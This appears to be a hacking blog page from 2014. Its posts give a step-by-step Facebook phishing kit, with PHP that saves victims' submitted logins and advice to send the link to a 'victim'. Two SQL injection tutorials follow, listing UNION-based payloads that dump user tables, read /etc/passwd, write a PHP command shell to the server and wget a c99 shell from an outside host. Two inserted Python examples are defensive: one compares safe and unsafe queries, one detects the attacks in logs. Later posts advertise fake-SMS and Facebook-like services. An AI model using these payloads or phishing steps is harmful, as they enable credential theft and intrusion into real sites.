Thursday, 6 November 2014

Posted by Haxor On 02:57

Salam From HaXor Farhan (MR-Crack) & (Muslim Shadow)

Steps to create a phishing page:

1. Go to the Facebook page and right-click on the page. You will see the option "view source page"; click on that.
2. A new tab will open containing the source code. Select all of it and paste it into Notepad.
3. In Notepad, press CTRL+F and type ACTION.
4. Find the text that looks like this:

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5. Change that text to post.php, so that it looks like this:

                                                 action="post.php"

6. Save it on your desktop with the name index.htm, not index.html.

7. Your phishing page is now ready. It will look like a Facebook login page.
8. Open a new Notepad file and save the following code with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9. You now have two files: index.htm and post.php. The file extensions are important.

10. Upload them to a web hosting site. I suggest www.000webhost.com or www.my3gb.com.

11. I prefer 000webhost because it is easy to use.

12. Create an account there.
13. Go to the control panel, then to the file manager.

14. A new window will pop up. Go to public_html.

15. Delete the file named default.php, then upload the two files index.htm and post.php one by one.

16. As the last step, click on view for index.htm. It will look the same as the Facebook page.
17. Copy the URL of that page and send the link to your victim. When the victim tries to log in to it with a username and password, the page redirects to Facebook, and you will be able to see the password.

18. Open your 000webhost account and go to the file manager, then public_html. There you will find a new file named username.txt.

19. Click on view and you will have your friend's password and email ID.

Posted by Haxor On 02:46

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
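The definition above, as an added Python example that is not from the original post: the same lookup built by string concatenation and with a typed, bound parameter. It uses an in-memory SQLite database in place of MySQL; the table names, rows and function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """Build an in-memory database holding constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (catid INTEGER, title TEXT);
        CREATE TABLE users (user_name TEXT, password TEXT);
        INSERT INTO articles VALUES (1, 'Welcome');
        INSERT INTO users VALUES ('admin', 'constructed-hash');
    """)
    return db


def titles_concatenated(db, catid):
    # Vulnerable: the request parameter becomes part of the SQL text,
    # so anything after the number is parsed as SQL.
    sql = "SELECT catid, title FROM articles WHERE catid = " + catid
    return db.execute(sql).fetchall()


def titles_bound(db, catid):
    # Hardened: enforce the expected type first, then pass the value
    # as a bound parameter so it can never change the statement.
    try:
        value = int(catid)
    except ValueError:
        return []
    return db.execute(
        "SELECT catid, title FROM articles WHERE catid = ?", (value,)
    ).fetchall()


# Constructed input of the kind the definition describes: data that carries SQL.
INJECTED = "-1 UNION SELECT user_name, password FROM users"

if __name__ == "__main__":
    db = make_db()
    print(titles_concatenated(db, "1"))       # normal request
    print(titles_concatenated(db, INJECTED))  # rows from the users table leak
    print(titles_bound(db, INJECTED))         # rejected: not an integer
```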


Step-by-Step tutorial for SQL Injection

Step 1: Find a website that is vulnerable to the attack. This is the first step in SQLi and, as with every other attack, it is the most time-consuming step, and the only time-consuming one. Once you get through it, the rest is a cakewalk. First, which kinds of pages are vulnerable to this attack? We are providing you with a few dorks (Google search strings for finding vulnerable sites). At the end of this post we'll also provide a list of vulnerable sites.


How to check if a webpage is vulnerable to this attack?
Once you have executed the dorks, pick one of the search results. Say, for example:
hxxp://www.website.com/index.php?catid=1

Add a ' (apostrophe) at the end of the URL, so that the URL looks like:
hxxp://www.website.com/index.php?catid=1'

If the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search result.

Typical errors you'll get after appending the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():

Step 2: Once you find a vulnerable site, you need to enumerate the number of columns and those columns that are accepting the queries from you.

Append an 'order by' statement to the URL.
eg. hxxp://www.website.com/index.php?catid=1 order by 1

Continue increasing the number after order by until you get an error. The highest number for which you do not get an error is the number of columns in the table. Next, find out which column numbers are accepting the queries.

Append an 'Union Select' statement to the URL. Also precede the number after "id=" with a hyphen or minus.
Say from the above step, you got that the table has 6 columns. 
eg. hxxp://www.website.com/index.php?catid=-1 union select 1,2,3,4,5,6

Result of this query will be the column numbers that are accepting the queries. Say we get 2,3,4 as the result. Now we'll inject our SQL statements in one of these columns. 

Step 3: Enumerating the SQL version
We'll use the mysql command @@version or version() to get the version of the db. We have to inject the command in one of the open columns. Say we use column number 2.

eg. hxxp://www.website.com/index.php?catid=-1 union select 1,@@version,3,4,5,6

You'll get the version of the database in the place where you had got the number 2. If the version number starts with 5 or higher, you are good to go. If it is lower, move on to another site.

Step 4: Exploit
To get list of databases:
hxxp://www.website.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--

The result will display a list of databases on the site. From here on, we'll show the results we got from our test.
Result: information_schema,vrk_mlm

To know the current database in use:
hxxp://www.website.com/index.php?catid=-1 union select 1,concat(database()),3,4,5,6--
Result: vrk_mlm

To get the current user:
hxxp://www.website.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6--
Result: vrk_4mlm@localhost

To get the tables:
hxxp://www.website.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Result: administrator,category,product,users

We'll concentrate our attack on the users table.

To get the columns:
hxxp://www.website.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position,email_id,password,edited_on,last_login,created_on,chain_number,phone,address

By looking closely at the columns and the order of the tables, we can conclude that the columns starting from id,incredible_id belong to the users table, and those are the ones we are interested in.

Extract information:
union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users--

Now you will get the admin user name and password.
Posted by Haxor On 02:21

First of all, find a website which is vulnerable to SQL injection. You can find websites by dorks or manually, like I have found this one.
You need 2 main things:
  1. Root path of the website
  2. A writable directory
Most of the time, you will see the root path in an SQL error from that site, like the following one.

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/aeiti/public_html/admin/requires/functions.php on line 1327
Well, if the vulnerable website doesn't show the root path, don't worry: I will show you how to find the root path, and also a writable directory.
www.site.com/index.php?id=10'
I am not starting with the ABCs of SQLi; I hope you know the basics.
Now we have to find the columns of the website and then the vulnerable columns. My site has 5 columns, and 3 is the vulnerable column.
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--
Let's Try To Load Files Of The Website
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--
We won't need to read any of the files mentioned above; they are just to increase your knowledge. Now we have to check the file privileges of the current user. For this, you first have to find the current username,
like this:
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--
That gives the current username; mine is Ch3rn0by1.
Now check the file privileges for user Ch3rn0by1:
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--
If it shows Y (yes) in the vulnerable column of the website, that means we have file privileges for the current user Ch3rn0by1.
If it doesn't show Y, don't waste your time there :D

OK, now we need to know the root path for this web server. For this we need to know the web server type. You can use the Firefox add-on Server Spy for this.
Server Spy add-on: https://addons.mozilla.org/en-us/firefox/addon/server-spy/
You can also use Havij and some other tools to detect the web server type.
To find the web server from the file /etc/passwd, use this query:
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('/etc/passwd'),5--
Now we have our web server, e.g. (/home/Ch3rn0by1).
Now read one more file:
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--
Here Ch3rn0by1 is your web server software name, as in server name.conf.

Now we have the root path,
/home/site.com/public_html etc.
Now we have to find a writable directory. For this you can use Google dorks as well as your own knowledge :D
site www.site.com/dir/*/*/*/*/
So it's site.com/ch3rn0by1/writeable

now we will upload our evil code
www.site.com/index.php?id=10 UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+
ok now we have to execute our commands
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a
Now we will use wget command to upload our evil script
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt
Now we will rename our c99.txt to php in order to execute it :D
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php
now open it
www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D
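
Every request in the two walkthroughs above carries its SQL keywords in the URL, so each one is recorded in the web server's access log. The detector below is an added example, not from the original posts; the signature names, the function names and the log lines (combined log format, documentation IP range) are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Keyword patterns seen in the requests above, matched after URL-decoding.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "order_by_probe": re.compile(r"=\s*-?\d+\s+order\s+by\s+\d+", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "trailing_quote": re.compile(r"=[^&\s]*'(?:&|$)"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(log_line):
    """Return the sorted names of all signatures found in the request's query string."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    query = unquote_plus(m.group(1)).partition("?")[2]
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))


def scan(lines):
    """Return {line_number: [signature names]} for every line with at least one hit."""
    hits = {}
    for number, line in enumerate(lines, 1):
        found = classify(line)
        if found:
            hits[number] = found
    return hits


# Constructed access-log lines; the last one is an ordinary request.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Nov/2014:02:46:01 +0000] "GET /index.php?catid=1%27 HTTP/1.1" 200 512',
    '203.0.113.7 - - [06/Nov/2014:02:46:09 +0000] "GET /index.php?catid=1+order+by+7 HTTP/1.1" 200 498',
    '203.0.113.7 - - [06/Nov/2014:02:47:30 +0000] "GET /index.php?catid=-1+UniOn+SeleCt+1,group_concat(table_name),3+from+information_schema.tables-- HTTP/1.1" 200 733',
    '203.0.113.7 - - [06/Nov/2014:02:49:12 +0000] "GET /index.php?id=-10+union+select+1,2,load_file(%27/etc/passwd%27),4,5-- HTTP/1.1" 200 901',
    '198.51.100.20 - - [06/Nov/2014:02:50:00 +0000] "GET /news.php?id=42 HTTP/1.1" 200 1204',
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG).items():
        print(number, names)
```

Several signatures firing from one client within minutes, in the order quote, order by, union select, is the progression both posts describe; a `file_read` or `file_write` hit means the database account holds the FILE privilege and should be treated as an incident.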

Saturday, 11 October 2014

Posted by Haxor On 14:08

EARN BTC / DOGE / PAYPAL DOLLARS [FREE]


Introducing you to a new mining site.


Why use Cointellect?
Cointellect offers free Dogecoin mining. Their service also allows users to purchase hashing power and enables miners to contribute to a pool.
Besides that, you get a 10% affiliate commission even if your referral is just a free miner.
  




    How to get started ?
 1- Go and create an account here : http://cointellect.com/?code=b5a331c4
2- Confirm your account via "Activation Email" ...
3- Now Download software from there, Install and then run it in your PC / RDP...



Personally telling you that I am running this software in my many RDPs.. So earning many euros from it. :D





Exchange Dogecoin to Bitcoin: 
1- You can simply use an exchange site to convert your Dogecoins to Bitcoins.
For example this site: https://bter.com/


Some tips to earn more with Cointellect:
1- End unnecessary programs that run in the background.
2- Don't forget to use invitation code so you can get your first coin soon.


Thanks! I hope you Enjoyed it... :) 

Sunday, 7 September 2014

Posted by Unknown On 06:24

  • I will tell you the method for how to send fake SMS...
  • You can send SMS all over the world.
  • You can send unlimited messages.
  • The best thing is (you can send SMS from any name or number)
  • So what are you waiting for??


Order Now...


Thursday, 21 August 2014

Posted by Unknown On 22:47
            
 HElloo... :)
Today I am sharing a trick for how to get free Facebook likes: photo, status, page liker and auto commenter. Here you don't need any technical knowledge... Go to this link.

                                                                       http://www.fiverr.com/mrhamxa
                    
Posted by Unknown On 22:26
HElloo... :)
Today I am sharing a trick to make a nameless Facebook profile name. Here you don't need any technical knowledge... Go to this link and buy this method...

         

           http://www.fiverr.com/mrhamxa